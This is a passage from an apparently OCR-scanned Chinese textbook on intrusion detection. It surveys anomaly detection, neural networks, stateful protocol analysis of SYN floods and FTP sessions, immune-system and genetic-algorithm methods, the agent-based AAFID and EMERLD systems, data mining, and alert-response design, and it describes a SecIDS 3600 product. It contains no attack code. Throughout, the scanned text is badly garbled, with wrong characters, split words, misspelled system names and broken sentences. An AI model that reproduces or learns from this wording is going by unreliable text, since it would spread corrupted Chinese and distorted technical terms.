变 指 攻击 痢 随 春 时 间 的 流逝 逐渐 改变 其 行为 模式 , 百 到 训练 系统 把 人 侵 行 为 作为 正常 行 


与 其 他 方法 相 比 ,TIM 方法 也 有 缺点 。 它 过 到 所 有 基于 等 习 方 法 相关 的 问题 。 在 这 
方面 ,方法 效率 依赖 于 训练 数据 的 质量 。 在 基于 学 习 的 系统 中 ,训练 数据 必须 反映 系统 的 
正 稼 活动 。 进 一 步 说 ,这 种 方法 产生 的 规则 不 可 能 复杂 到 足够 反映 所 有 可 能 的 正 芝 用户 
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行为 模式 。 尤 其 在 系统 运行 的 初期 ,这 种 罚 点 产生 大 量 的 错误 。 和 错误 率 局 是 由 于 如 采 一 
个 事件 不 能 匹配 任何 规则 头 , 也 就 是 说 ,系统 不 能 在 训练 数据 集中 遇 到 该 事件 类 型 时 , 事 
件 总 是 触发 一 个 异 常 。 这 个 方法 是 DEC 公司 Polycenter 人 侵 检 测 产 品 的 基础 ,也 是 此 后 
许多 异常 检测 研究 的 基础 。 

6) 神经 网 络 

神经 网 络 使 用 可 适应 学 习 技术 描述 异常 行为 。 这 种 非 参 分 析 技 术 运 作 在 历史 训练 数 
据 集 上 。 历 史 训 练 数据 集 假定 是 不 包含 任何 指示 入 侵 或 其 他 不 希望 的 用 户 行为 。 

神经 网 络 由 许多 称 为 单元 的 简单 处 理 元 系 组 成 。 这 些 单元 通过 使 用 加 权 的 连接 相互 
作用 。 一 个 神经 网 络 知识 根 据 单 元 和 它们 权 值 间 连 接 编 码 成 网 络 结构 。 实 际 的 学 习 过 程 
是 通过 改变 权 值 和 加 入 或 移 去 连接 进行 的 。 

神经 网 络 的 处 理 涉及 两 个 阶段 ; 第 一 阶段 中 ,一 个 代表 用 户 行 为 的 历史 或 其 他 样本 
数据 集 被 移 人 网 络 ;第 二 阶段 中 ,网 络 接受 事件 数据 并 与 历史 行为 参数 比较 ,决定 相似 和 
个 同 之 处 。 

网 络 通 过 改变 单元 状态 改变 连接 权 值 ,通过 加 入 或 移 去 一 个 连接 指示 一 个 事件 寞 第 。 
通过 逐步 修正 ,网 络 也 更 改 它 的 关于 构成 一 个 正和 帝 事 件 内 容 的 定义 。 

神经 网 络 方法 需要 通过 大 量 假 定 进行 异 第 检测 。 由 于 它们 不 适用 一 个 固定 特性 集 定 
义 用 户 行 为 ,因此 特性 选择 是 不 相关 的 。 神 经 网 络 在 度量 的 预期 统计 分 布 没有 假设 前 提 ， 
因此 这 种 方法 与 其 他 非 参 技术 相关 的 典型 统计 分 析 相 比 保留 了 一 些 优点 。 

在 使 用 神经 网 络 进行 人 侵 检测 相关 问题 中 ,有 一 种 形成 不 稳定 配置 的 趋势 。 在 这 种 
配置 中 ,网 络 由 于 非 明 显 原因 学 习 有 某 些 东西 失败 。 无 论 怎样 ,使 用 神经 网 络 进行 人 侵 检 测 
的 主要 不 足 是 神经 网 络 不 能 为 它们 找到 任何 异 当 ,提供 任何 解释 。 这 种 情况 妨碍 了 用 户 
获得 说 明 性 资料 或 寻求 人 侵 安全 问题 根源 的 能 力 。 这 使 它 很 难 满足 安全 管理 的 需求 。 尺 
管 一 些 研 究 者 已 提出 相应 方法 解决 这 些 问题 ,但 发 表 的 数据 仍然 没有 说 明神 经 网 络 方法 
的 可 行 性 。 


3 基于 状态 的 协议 分 析 技 术 

传统 的 入侵 检测 系统 一 般 都 采用 模式 匹配 技术 ,但 由 于 技术 本 和 号 的 特点 ,使 其 具有 计 
算 量 大 、 检 测 效率 低 等 缺点 ,而 基于 协议 分 析 的 检测 技术 较 好 地 解决 了 这 些 问题 。 其 运用 
协议 的 规则 性 及 整个 会 话 过 程 的 上 下 文 相关 性 ,不仅 提高 了 入 侵 检测 系统 的 速度 ,而 且 减 
少 了 漏 报 和 误 报 率 。 

协议 分 析 技 术 一 般 可 以 分 为 两 种 ,具体 如 下 。 

(1) 模式 匹配 技术 。 

特征 检测 的 传统 方法 是 模式 匹配 技术 。 模 式 匹 配 技 术 是 早期 入 侵 检 测 系统 采用 的 分 
析 方 法 ,其 基本 原理 是 在 一 个 单独 数据 包 中 寻找 一 串 固定 的 字 节 。 随 着 攻击 手段 和 方法 
变种 的 多 样 化 ,攻击 特征 库 变 得 无 比 庞 大 ,需要 的 计算 量 将 是 攻击 特征 字 节 数 . 数 据 包 字 
节 数 .每 秒 的 数据 包 数 和 数据 库 的 攻击 特征 数 的 乘积 。 显 然 ,单一 的 模式 匹配 方法 已 经 不 
能 适应 网 络 的 发 展 。 

网 神 SecIDS 3600 入 侵 检 测 系统 的 当前 系统 文 持 应 用 分 类 对 象 , 包 括 视频 协议 、 网 络 
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游戏 .即时 通信 、 常 用 协议 、.P2P 下 载 、 股 票 金 融 HTTP 传统 协议 . 流 媒体 、 网 络 电话 、 数 
据 库 协议 共 11 种 特征 组 ,400 多 种 协议 。 随 看 应 用 发 展 的 需求 ,特征 库 会 不 断 更 新 ,可 以 
随时 关注 奇 安信 公司 网 站 ,及 时 下 载 最 新 版 本 的 特征 库 。 

(2) 协议 分 析 技 术 。 

协议 分 析 技 术 是 新 一 代 IDS 探测 攻击 手法 的 主要 技术 , 它 利 用 网 络 协议 的 高 度 规 则 
性 快速 探测 攻击 的 存在 。 协 议 分 析 需 要 对 数据 包 根 据 其 所 属 协议 的 类 型 ,将 其 解码 后 再 
分 机 。 相 对 于 模式 匹配 技术 , 它 更 准确 ,分 析 速 度 更 快 。 

利用 协议 分 析 技 术 可 以 解决 以 下 问题 ， 

J 分 析 数 据 包 中 的 命令 字符 串 。 例 如 ,黑客 经 党 使 用 的 HTTP 攻击 ,因为 HTTP 多 
许 用 十 六 进 制 表 示 URL。 

进行 IP 雁 片 重组 ,防止 了 P 雁 片 攻击 。 不 同类 型 的 网 络 , 链 路 层 数 据 帆 都 有 一 个 
上 限 。 如 果 IP 层 数 据 包 的 长 度 超 过 这 个 上 限 , 就 要 分 片 处 理 。 各 日 路 由 到 达 主 机 后 要 进 
行 重组 。 因 此 ,黑客 可 以 利用 雁 卢 重组 算法 进行 攻击 。 

减低 误 报 率 。 因 便 单 模式 识别 ,很 难 限定 匹配 的 开始 点 和 终结 点 ,也 就 不 能 准确 
定位 攻击 串 的 位 置 , 当 某 协议 的 其 他 位 置 出 现 该 字 串 时 ,也 会 被 认为 是 攻击 串 。 这 就 产生 
了 误 报 现象 。 

协议 分 析 方 法 可 以 根据 协议 信息 精确 定位 检测 域 ,分 析 攻 击 特征 ,有 和 针对 性 地 使 用 证 
细 具 体 的 检测 手段 ,提高 检测 的 全 面 性 ,准确 性 和 效率 。 针 对 不 同 的 异常 和 攻击 ,灵活 定 
制 检 测 方式 ,由 此 可 检测 大 量 异 稼 。 但 对 于 一 些 多 步骤 .分布 式 的 复 录 攻击 的 检测 , 单 赁 
单一 数据 包 检 测 或 简单 重组 是 无 法 实现 的 。 所 以 ,在 协议 分 析 基 础 上 引入 状态 转移 检测 
拉 术 , 接 下 来 分 析 利 用 基于 状态 的 协议 分 析 拉 术 检 测 一 些 典 型 人 侵 的 实现 。 

根据 网 络 协议 状态 信息 分 析 , 所 有 网 络 都 能 以 状态 转移 形式 描述 。 状 态 转 移 将 攻击 
描述 成 网 络 事件 的 状态 和 操作 (匹配 事件 ) ,被 观测 的 事件 如 果 符 合 有 和 穷 状态 机 的 实例 (每 
个 实例 部 表示 一 个 攻击 场景 ) ,部 可 能 引起 状态 转移 的 发 生 。 如 来 状态 转移 a 到 一 个 危 填 系 
统 安 全 的 终止 状态 ,就 代表 看 攻击 的 发 生 。 这 种 方式 以 一 种 简单 的 方式 描述 复 洒 的 入 侵 
场景 。 

价 助 声明 原 语 计算 状态 转换 的 条 件 , 包 括 数 据 包 和 网 络 日 志 原 语 , 如 检查 IP 地 址 是 

是 假冒 地 址 的 原 请 ip_saddr fake(ip_packet) ,检查 包 总 长 度 选项 中 所 声明 长 度 与 实际 

长 度 是 否 一 致 的 原 语 ip_fray_overlap(ip_packet) 等 。 
(1) 检测 TCP SYN Flooding 攻击 。 
攻击 描述 ; 在 短 时 间 内 ,攻击 者 发 送 大 量 SYN 报 文 建立 TCP 连接 ,在 服务 器 端 发 送 
应 答 包 后 ,客户 珊 不 发 出 确认 ,服务 冀 问 会 维持 每 个 连接 , 耻 到 超时 ,这 样 会 使 服务 端的 
TCP 货源 迅速 析 网 ,导致 正 党 连接 不 能 进入 。 

解决 方式 : 当 客户 端 发 出 建立 TCP 连接 的 SYN 包 时 , 便 跟 踩 记录 此 连接 的 状态 , 直 
到 成 功 完成 或 超时 。 同 时 ,统计 在 规定 时 间 内 接收 到 这 种 SYN 包 的 个 数 ,在 超过 示 个 规 
定 的 临界 值 , 则 说 明 发 生 TCP SYN Flooding 攻击 。 

(2) 检测 FTP 会 话 。 

一 个 FTP 会 话 可 以 分 为 以 下 4 个 步骤 。 
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J 建立 控制 连接 。FTP 客户 端 建立 一 个 TCP 连接 到 服务 器 的 FTP 端 21。 

客户 身份 验证 。FTP 用 户 发 送 用 户 名 和 口令 ,或 匿名 登录 到 服务 央 。 

执行 客户 命令 。 客 户 癌 服务 器 发 出 命令 ,如 果 要 求 数据 传输 , 则 客户 使 用 一 个 临 
时 端口 和 服务 器 端口 建立 一 个 数据 连接 ,进行 数据 传输 。 

打 开 连接 。FTP 会 话 完成 后 , 断 开 TCP 连接 。 

客户 端 通过 身份 验证 后 才 合法 执行 命令 。 以 LIST 命令 为 例 ,LIST 命令 列表 显示 文 
件 或 目录 ,将 引发 一 个 数据 连接 的 建立 和 使 用 ,客户 端 使 用 PORT 命令 发 送 客户 IP 地 址 
和 端口 号 给 服务 器 ,用 于 建立 临时 数据 连接 。 


4 其 他 检测 方法 

还 有 一 些 人 侵 检 测 方法 既 不 是 误 用 检测 ,也 不 是 异常 检测 。 这 些 方法 可 用 于 上 述 两 
类 检测 。 它 们 可 以 驱动 或 精炼 这 两 种 检测 形式 的 先行 活动 ,或 以 不 同 于 传统 的 观点 影响 
检测 策略 方法 。 

1) 免疫 系统 方法 

在 一 个 创新 的 .有 前 途 的 研究 项 目 中 ,New Mexico 大 学 的 研究 者 对 计算 机 安全 有 一 
个 新 的 看 法 。 研 究 者 提出 的 问题 是 “一 个 人 如 何以 保护 自己 的 方式 装配 计算 机 系统 ?” 回 
答 这 个 问题 时 ,他 们 注意 到 生理 免疫 系统 和 系统 保护 机 制 之 间 有 显著 的 相似 性 。 

上 述 两 个 系统 运行 的 关键 是 执行 “自我 / 非 我 ”决定 的 能 力 。 也 就 是 说 ,一 个 组 织 的 免 
疫 系统 决定 哪 种 东西 是 无 害 的 , 哪 种 是 病毒 和 其 他 有 害 物体 。 由 于 免疫 系统 通过 使 用 缩 
氨 酸 、 短 蛋白 片段 作出 判断 ,因此 研究 者 决定 集中 在 一 些 认为 与 缩 氨 酸 相似 的 计算 机 属性 
上 研究 异常 检测 。 

在 决定 把 系统 调用 作为 一 个 主要 信息 源 时 ,研究 者 考虑 了 数据 的 大 量 目标 ,包括 数据 
量 .可 靠 检测 误 用 能 力 和 以 一 种 适合 高 级 模式 匹配 技术 编码 的 合适 度 。 他 们 决定 集中 在 
短 顺 序 的 系统 上 ,进一步 忽略 传递 给 调用 的 参数 ,而 仅 看 它们 的 临时 顺序 。 

系统 首先 被 用 来 进行 异常 检测 。 系 统 按照 两 个 阶段 对 入侵 检测 分 析 处 理 , 第 一 阶段 
建立 一 个 形成 正常 行为 特征 轮廓 的 知识 库 。 这 里 描述 的 行为 不 是 以 用 户 为 中 心 ,而 是 以 
系统 处 理 为 中 心 ,与 这 个 特征 轮廓 的 偏差 被 定义 为 异常 。 在 检测 系统 的 第 二 阶段 ,特征 轮 
廓 用 于 监控 随后 的 异常 系统 行为 。 

源 于 调用 特权 程序 的 系统 调用 顺序 随 着 时 间 的 推移 被 收集 ,系统 特征 轮廓 由 长 度 为 
1 和 0 的 独一无二 的 序列 组 成 。 使 用 3 个 度量 描述 正常 行为 的 偏离 : 成 功 的 开拓 ,不 成 功 
的 开拓 和 错误 条 件 。 

随后 的 研究 是 对 集中 描述 正常 行为 的 不 同方 法 进行 比较 。 当 研究 监控 更 复杂 的 系统 
时 ,是 否 有 更 有 力 的 数据 模型 方法 ,以 显著 改进 这 个 问题 。 令 人 意外 的 是 ,有 力 的 数据 模 
型 技术 (例如 , 隐 马 尔 可 夫 模 型 ,尽管 计算 量 大 ,但 是 十 分 可 靠 ) 也 不 能 给 出 比 基 于 时 间 的 
较 简 单 的 顺序 模型 好 的 效果 。 

尽管 自我 / 非 我 技术 出 现 并 成 为 一 个 十 分 有 力 和 有 和 希望 的 方法 ,但 它 不 是 一 个 入 侵 检 
测 问题 的 彻底 解决 办 法 。 一 些 攻击 包括 伪装 和 策略 违背 ,不 涉及 特权 处 理 的 使 用 ,使 用 这 
种 方法 不 易 检测 。 
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2) 遗传 算法 

万 外 一 个 比较 复杂 的 执行 开间 检测 的 方法 征 使 用 遗传 算法 执行 时 间 数 据 分 析 。 

一 个 遗传 算法 是 一 类 被 称 为 进化 算法 的 一 个 实例 。 进 化 算法 吸收 达尔 文 日 然 选择 法 
则 ( 适 者 生存 ) 解 决 问题 。 遗 传 算法 用 允许 染色 体 的 结合 或 突变 以 形成 新 个 体 的 方法 使 用 
已 编码 表格 (也 称 染 色 体 )。 这 些 算法 在 多 维 优化 问题 处 理 方面 的 能 力 已 经 得 到 认可 。 在 
多 维 最 优化 问题 中 ,染色 体 由 优化 的 变量 编码 值 组 成 。 

在 研究 入 侵 检 测 的 遗传 算法 的 研究 者 眼中 ,入 侵 检 测 处 理 包 括 为 事件 数据 定义 假设 
癌 量 , 癌 量 指示 是 一 次 入 侵 或 不 是 一 次 入 侵 。 然 后 测试 假设 是 盏 正 确 , 并 基于 测试 结果 尽 
力 设计 一 个 改进 的 假设 。 重复 这 个 处 理 ,直至 找到 一 个 解决 方法 为 上 上 。 

在 这 个 处 理 中 ,遗传 算法 的 角色 是 设计 改进 的 假设 。 遗 传 算 法 分 析 涉 及 两 步 : 第 一 
步 是 用 一 个 位 串 对 问题 的 解决 办 法 进行 编 公 ;第 二 步 是 与 一 些 进化 标准 比较 ,找到 一 个 最 
合适 的 函数 测试 群体 中 的 每 个 个 体 , 例 如 ,所 有 可 能 的 问题 解决 方法 。 

在 由 Supelec 和 法 国 工 程 大 学 开发 的 GASSATA 系统 中 ,遗传 算法 使 用 一 个 假设 向 
量 集 ,n 维 (n 是 洲 在 的 已 知 攻 击 数 ) 的 瓦 (每 个 重要 事件 流 对 应 的 加 量 ) 筱 应 用 到 区 分 系 
统 事件 问题 上 。 如 采 瓦 , 代表 一 次 攻击 , 则 定义 为 1 或 0。 

最 合适 的 困 数 有 两 个 部 分 。 盲 先 , 一 个 特定 攻击 对 系统 的 万 险 性 滋 以 假设 问 量 人 , 然 
后 由 一 个 二 次 请 耗 销 数 对 比 结 末 再 整 , 删 际 不 实际 的 假设 。 处 理 目 标 优 化 分 析 的 结 来 ,以 
至 于 一 个 已 检测 攻击 是 真实 的 (概率 接近 1) 和 一 个 已 检测 攻击 是 错误 的 (概率 接近 0)。 

遗传 算法 对 于 异常 检测 的 实验 结果 是 令 人 满意 的 。 在 实验 操作 中 ,正确 肯定 的 平均 
概率 (现实 攻击 的 准确 检测 ) 是 0. 996 ,错误 肯定 的 平均 概率 (没有 攻击 的 检测 ) 是 0. 004。 
所 需 的 构造 过 滤 辫 的 时 间 也 是 令 人 满意 的 。 对 于 一 个 200 次 攻击 的 样本 集 , 一 般 用 户 持 
续 使 用 系统 超过 30 分 钟 才能 生成 审计 记录 ,该 系统 只 需 10 分 25 秒 即 可 和 完成 。 

下 面 是 用 这 种 方法 进行 误 用 检测 的 不 足 。 

J 系统 不 能 考虑 由 事件 缺席 描述 的 攻击 (例如 , “程序 员 不 使 用 cc 作为 编 详 需 ” 
规则 ) 。 

由 于 个 别 事件 流 用 二 进 制 表 达 形 式 ,因此 系统 不 能 检测 多 个 同时 攻击 。 

如 采 几 个 攻击 有 相同 的 事件 或 组 事件 ,并 且 攻 击 者 使 用 这 个 共性 进行 多 个 同时 攻 
击 , 则 系统 不 能 找到 一 个 优化 的 假设 回 量 。 

系统 不 能 在 审计 跟 嗓 中 精确 地 定位 攻击 ,因此 不 会 有 临时 性 出 现在 检测 各 的 结 
ts 

3) 基于 代理 的 检测 

基于 代理 的 入 侵 检 测 方法 基于 在 一 个 主机 上 执行 某 种 安全 监控 功能 的 软件 实体 。 它 
们 目 动 运行 ,也 就 是 说 ,它们 仅 由 操作 系统 ,而 不 是 其 他 进程 控制 。 基 于 代理 的 方法 连续 
运作 , 开 且 除了 与 其 他 相似 的 结构 代理 交流 和 协作 外 ,还 从 中 学 习 。 

基于 代理 的 检测 方法 是 非常 有 利 的 。 根 据 开 发 者 的 最 初 想法 ,一 个 代理 可 以 是 简单 
的 ,例如 ,记录 在 一 个 特定 时 间 间 隅 内 的 一 个 特定 命令 触发 的 个 数 ,也 可 以 是 很 复杂 的 , 例 
如 ,在 一 个 特定 环境 中 寻找 一 系列 攻击 的 证 据 。 

代理 的 能 力 范 围 允 许 基于 代理 的 人 侵 检 测 系统 提供 一 种 异 凋 检测 和 误 用 检测 的 混合 
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能 力 。 例 如 ,一 个 代理 可 以 设计 使 它 的 检测 能 力 适 应 本 地 环境 变化 。 它 也 可 能 在 一 个 很 
长 时 间 内 监控 非常 不 确定 的 模式 ,因此 能 检测 缓慢 攻击 。 最 后 ,一 个 代理 能 对 一 个 检测 到 
的 问题 制定 非常 精细 的 啊 应 。 例 如 ,改变 一 个 进程 的 优先 级 ,有 效 地 使 它 慢 下 来 。 

QD 入侵 检测 的 有 目 动 代理 。 

一 个 基于 代理 的 和 人 侵 检测 的 自动 代理 (AAFID) 由 Purdue 大 学 的 开发 者 研制 。 基 于 
代理 的 入 侵 检 测 系 统 体系 要 求 代 理 实现 一 个 分 层 顺 序 控制 和 报告 结构 。 一 个 主机 上 能 驻 
留任 意 数 量 的 代理 。 在 一 个 特定 主机 上 的 所 有 代理 像 一 个 单独 的 入 侵 检测 的 自动 代理 报 
告 它们 的 发 现 。 收 发 需 也 对 代理 报告 的 信息 进行 数据 精简 ,并 向 一 个 或 多 个 检测 大 、 下 一 
级 分 层 报告 结果 。 

由 于 AAFID 的 体系 结构 允许 元 余 接 收费 汇报 信息 ,一 个 监控 磊 的 失效 不 会 危及 入 
侵 检测 系统 的 操作 。 监 控 器 有 能 力 从 整个 网 络 访问 数据 ,然后 可 以 进行 来 自 接收 器 的 结 
采 整 合 。 这 个 特点 使 系统 能 检测 多 主机 攻击 。 通 过 一 个 用 户 接 口 , 系 统 用 户 输入 命令 控 
制 监控 如。 反 过 来 ,它们 基于 这 些 用 户 命 令 控制 接收 盘 。 

AAFID 和 其 他 基于 代理 的 方法 相 比 ,具有 如 下 优点 。 

它 比 其 他 人 和 人 侵 检测 系统 对 插入 和 逃避 攻击 更 具有 抵御 能 力 。 
需要 时 ,体系 结构 提供 加 入 新 组 件 或 替换 旧 组 件 的 能 力 , 更 容易 缩放 。 
在 部 署 代 理 之 前 ,能 独立 于 整个 系统 进行 测试 。 


。 因为 代理 能 相互 通信 ,因此 能 成 组 部 署 ,每 个 代理 执行 不 同 的 简单 功能 ,但 却 为 一 
个 复杂 结果 服务 。 

下 面 是 AAFID 体系 的 缺点 。 

。 监控 天 是 单独 失效 点 。 如 果 一 个 监控 硕 停 止 工作 , 则 它 控制 的 所 有 接收 需 停 止 产 


生 有 用 信息 。 存 在 可 能 的 解决 策略 ,但 它们 仍然 没有 被 测试 。 
如 果 备 份 监控 占用 于 解决 第 一 个 问题 ,处 理 信息 一 致 性 和 备份 是 很 困难 的 。 这 种 


情况 要 求 附加 机 制 。 
。 缺少 允许 不 同 用 户 对 入 侵 检 测 采 用 不 同 访问 模式 的 访问 控制 。 这 个 显 堵 映 陷 存 
在 于 每 一 级 体系 中 。 


由 于 攻击 者 证 据 到 达 监 控 融 有 传播 时 间 ,这 会 导致 问题 的 发 生 。 这 个 问题 是 所有 
分 布 人 侵 检 测 系统 共 有 的 。 

与 信 侵 检测 其 他 部 分 一 样 , 在 设计 入侵 检测 系统 用 户 接 口 时 ,需要 更 多 的 洞察 力 。 
这 种 洞察 力 涉及 从 演示 方案 到 方针 结构 和 具体 方案 。 

EMERLD。 

使 用 分 布 代理 方法 进行 人 侵 检测 的 第 二 个 体系 是 EMERLD 系统 ,是 由 SRI Interna- 
tional 公司 研究 并 开发 的 原型 系统 。EMERLD 在 一 个 框架 中 包括 大 量 本 地 监控 器 ,这 个 
框架 回 一 个 全 局 检测 需 数组 文 持 分 布 的 本 地 结果 , 反 过 来 ,全 局 检测 需 数 据 确认 警报 和 
警告 。 

像 SRI International 公司 以 前 的 人 侵 检 测 系统 IDES 和 NIDES 一 样 ,EMERLD 也 
是 一 个 复合 人 侵 检 测 希 ,使 用 特征 分 析 和 统计 特征 轮廓 检测 安全 问题 。 

值得 注意 的 是 ,由 于 EMERLD 把 分 析 语 义 从 分 析 和 啊 应 逻辑 中 分 离 出 来 ,因此 在 整 
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个 网 络 上 更 容易 集成 。EMERLD 也 具有 在 不 同 抽象 层 进行 分 析 的 重要 能 力 。 进 一 步 来 
说 ,这 种 设计 支持 现代 入 侵 检测 系统 中 的 男 一 个 重要 议题 一 一 协作 性 。 

EMERLD 的 中 心 组件 是 EMERLD 服务 监控 需 , 它 在 形式 和 功能 上 和 AAFEFID 自动 
代理 相似 。 服 务 监控 器 可 编程 执行 任何 功能 ,并 且 可 以 部 署 在 主机 。 为 支持 分 层 数据 精 
简 ,服务 监控 融 进 行 分 层 , 执 行 一 些 本 地 分 析 并 回 高 级 监控 顺 报 告 结 果 和 附加 信息 。 这 个 
系统 也 支持 大 范围 的 自动 啊 应 ,对 负责 大 规模 网 络 的 用 户 来 说 非常 重要 ， 

由 于 EMERLD 是 建立 在 IDES 和 NIDES 之 上 的 ,因此 ,在 保护 大 的 分 布 式 网 络 方 
面 , 它 具 有 较 好 的 前 景 。 

4) 数据 挖掘 

与 一 些 基于 规则 的 异常 检测 具有 相似 性 的 方法 是 使 用 数据 挖掘 技术 建立 人 侵 检 测 模 
型 。 这 个 方法 的 目的 是 发 现 能 用 于 描述 程序 和 用 户 行为 的 系统 特性 一 致使 用 模式 集 。 接 
下 来 ,这 个 模式 集 由 引导 方法 处 理 形 成 识别 异常 和 误 用 的 分 类 器 , 即 检测 引擎 。 

数据 挖掘 指 从 大 量 实体 数据 中 抽出 模型 的 处 理 。 这 些 模型 经 稼 在 数据 中 发 现 对 于 其 
他 检测 方式 不 是 很 明显 的 事实 。 尽 管 有 许多 方法 可 用 于 数据 挖掘 ,但 挖掘 审计 最 有 用 的 
3 种 方法 是 分 类 ,关联 分 析 和 序列 模式 分 析 。 

分 类 给 几 个 预定 义 种 类 赋予 一 个 数据 条 目 。 分 类 算法 输出 分 类 需 , 如 判定 树 或 规 
则 。 在 入 侵 检 测 中 ,一 个 优化 的 分 类 器 能 够 可 靠 地 识别 落 入 正常 或 异常 种 类 的 审计 数据 。 

关联 分 析 识 别 数据 实体 中 字段 间 的 自 相 关 和 互相 关 。 在 入 侵 检 测 中 ,一 个 优化 的 
关联 分 析 算 法 识别 最 能 揭示 人 侵 的 系统 特性 集 。 

序列 模式 分 析 使 序列 模式 模型 化 。 这 些 模型 能 揭示 哪些 典型 审计 事件 发 生 在 一 
起 并 且 拥 有 扩展 人 侵 检测 模型 的 能 力 , 包 括 临 时 统计 度量 的 密 钥 。 这 些 度 量 能 提供 识别 
拒绝 服务 攻击 的 能 力 。 

研究 者 已 开发 出 标准 数据 挖掘 算法 扩展 ,适应 一 些 审计 和 其 他 系统 日 志 的 特殊 需求 。 


2.9 各 和 警 与 啊 应 


完成 系统 安全 状况 分 析 并 确定 系统 和 存在 的 问题 之 后 ,加 要 让 人 们 知道 这 些 问题 的 存 
在 。 在 某 些 问题 下 ,还 要 为 外 采取 行动 。 在 入 侵 检 测 梳理 过 程 中 ,这 个 阶段 称 为 啊 应 期 。 
理想 情况 下 ,系统 的 这 一 部 分 应 该 具有 丰 遇 的 啊 应 功能 特性 ,并 且 这 些 啊 应 特性 在 针对 安 
全 管理 小 组 的 每 一 位 成 员 进 行 裁 甬 后 ,能 够 为 他 们 服务 。 


291 对 喘 应 的 需求 


在 设计 入 侵 检测 系统 的 啊 应 时 ,需要 考虑 各 方面 的 因素 。 啊 应 要 设计 得 符合 通用 的 
安全 管理 或 事件 处 理 标 准 , 或 者 要 能 够 反映 本 地 管理 的 关注 扣 和 策略 。 在 为 商业 化 产品 
设计 啊 应 特性 时 ,应 该 给 最 终 用 户 提 供 一 种 功能 , 即 用 户 能 够 勇 裁定 制 啊 应 机 制 , 以 使 其 
侍 合 特定 的 需求 环境 。 

在 入 侵 检 测 系统 钱 究 和 设计 初期 , 绝 大 多 数 设 计 人 员 把 重点 放 在 系统 的 监视 和 分 析 

ii 


入 侵 检 测 与 入 侵 防 衔 


部 分 ,而 将 啊 应 部 件 留 给 用 户 设 计 并 舱 入 ,虽然 对 于 啊 应 部 件 中 什么 是 用 户 真 正 需要 的 问 
题 有 过 大 量 的 讨论 ,但 没有 人 对 可 能 要 玫 载 和 使 用 人 侵 检 测 系统 的 操作 环境 是 什么 模式 
有 一 个 非常 消 芭 的 认识 ，。 

一 个 很 重要 的 问题 是 术语 “用户 " 的 售 义 。 也 吏 征 说 , 完 葛 谁 征 一 个 人 侵 检 测 系 统 的 
标准 用 户 。 根 据 实际 情况 ,可 以 把 入 侵 检 测 系统 的 用 户 分 成 3 类。 第 一 类 用 户 是 网 络 安 
全 专家 或 管理 员 。 安 全 专家 有 时 仅 能 作为 系统 管理 小 组 的 咨询 顾问 。 因 为 这 些 安全 专家 
要 与 各 种 商业 性 的 入 侵 检 测 系统 打 交 志 ,他 们 非常 熟悉 各 种 入 侵 检测 工具 。 然 而 ,这 些 安 
全 专家 并 不 妃 古 熟悉 他 们 正在 监 钢 测试 的 网 络 系统 。 

第 二 拓 用 户 是 系统 管理 员 , 他 们 使 用 人 侵 检 测 系统 监控 和 你 护 他 们 管理 的 系统 。 在 
条 些 情 况 下 ,他们 是 入 侵 检 测 系统 的 强 有 力 的 用 户 , 因 为 他 们 对 检测 工具 和 你 护 的 网 络 环 
境 和 都 有 很 好 的 技术 理解 。 系 统管 理 员 也 是 对 和 人 侵 检 测 系统 要 求 最 局 的 用 户 , 有 时 他 们 和 需 
求 的 特性 很 少 锌 其 他 的 产品 用 户 使 用 。 

第 三 类 用 户 是 安全 苦 得 员 , 他 们 是 系统 审计 小 组 或 法 律 执 行 部 门 的 成 员 ,他们 使 用 入 
侵 检测 产品 监视 系统 的 运行 是 否 符合 法 律 或 者 协助 示 一 调 得 。 这 些 用 忆 可 能 不 具备 理解 


入 侵 检 测 工 具 或 正在 运行 的 系统 的 技术 理论 基础 。 然 而 ,他 们 对 调查 一 个 问题 的 过 程 非 
第 刚 悉 ,并 且 能 够 给 入 侵 检 测 系 统 设计 者 们 提供 重要 的 知识 来 源 。 
这 里 分 别 使 用 安全 管理 员 、 系 统管 理 员 和 调查 员 称 呼 这 3 类 用 户 。 


用 户 依 徘 人 侵 检 测 系统 对 海量 的 系统 事件 记录 数据 进行 复杂 而 准确 的 分 析 , 最 终 硕 
望 系统 可 徘 而 精确 地 运行 ,并 且 在 相应 的 时 刻 耳 接 将 分 析 的 结果 以 易于 理解 的 术语 形式 
传送 给 最 需要 它 的 相关 人 员 。 虽 然 需 要 对 用 户 的 需求 做 各 种 各 样 的 考虑 ,但 系统 目标 总 
是 一 致 的 。 

网 神 SecIDS 3600 人 侵 检 测 系统 里 拥有 管理 员 账 号 的 用 户 可 局 用 IDS 的 管理 会 话 ， 
以 更 改 配置 或 监控 IDS 行为 。 这 些 用 户 可 通过 控制 台 、Telnet、SSH 连接 到 IDS。 管 理 员 
分 为 4 个 级 别 : 审计 配置 、 管理 .系统 ,分 别 对 应 命令 行 中 的 Level0、Levell、Level2 和 
Level3。 人 管理 员 用 户 有 两 种 状态 : 活动 和 茶 用 (Active 和 Block ) 。 

针对 每 个 用 户 还 可 以 指定 其 可 以 访问 IDS 的 服务 范围 ,包括 HTTPS-Server、 
HTTP-Server、 SSH., Telnet-Server、 SNMP., PPTP Server、PPP 和 HTTPS-CA-Server、 
IDSEC 等 服务 ,同时 也 提供 到 IDS 的 FTP 服务 的 配置 。 


1 操作 系统 

设计 一 种 啊 应 机 制 时 ,首先 要 考虑 人 侵 检 测 系 统 运 行 环境 的 特性 ,对 于 下 接连 接 于 网 
络 运 行 中 心 的 入侵 检测 系统 ,其 报警 和 通知 要 求 很 可 能 与 安装 在 基于 家 庭 办 公 的 桌面 系 
统 的 人 侵 检 测 系统 有 很 大 的 不 同 。 

作为 通知 的 一 部 分 ,人 侵 检 测 系统 提供 的 信息 形式 也 依赖 于 运行 环境 。 网 络 运行 中 
心 的 职员 可 能 倾 回 于 能 提供 底层 网 络 流量 详细 资料 (如 分 片 包 的 内 容 ) 的 产品 。 一 个 安全 
管理 员 可 能 认为 和 人 侵 检测 系统 能 在 适当 的 时 刻 给 适当 的 人 员 提 供 一 个 告警 信息 即 可 ,其 
他 信息 不 具备 太 大 价值 。 

当 一 个 人 要 负责 监视 多 个 人 侵 检 测 系统 时 , 非 稼 适合 安 疹 声 啊 告警 般 。 这 种 告警 模 
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式 对 于 单一 控制 台 管 理 一 个 复杂 网 络 的 多 个 操作 而 言 是 较为 困难 的 。 

对 于 全 天 候 守 护 在 系统 控制 侣 前 的 操作 员 , 安 站 一 个 可 视 化 告 索 和 图 表 会 更 有 价值 。 
当 监 视 其 他 安全 设施 的 部 件 在 管理 区 域 不 可 见 时 ,这 种 可 视 化 告警 和 行动 图 表 也 特别 有 
带 助 。 


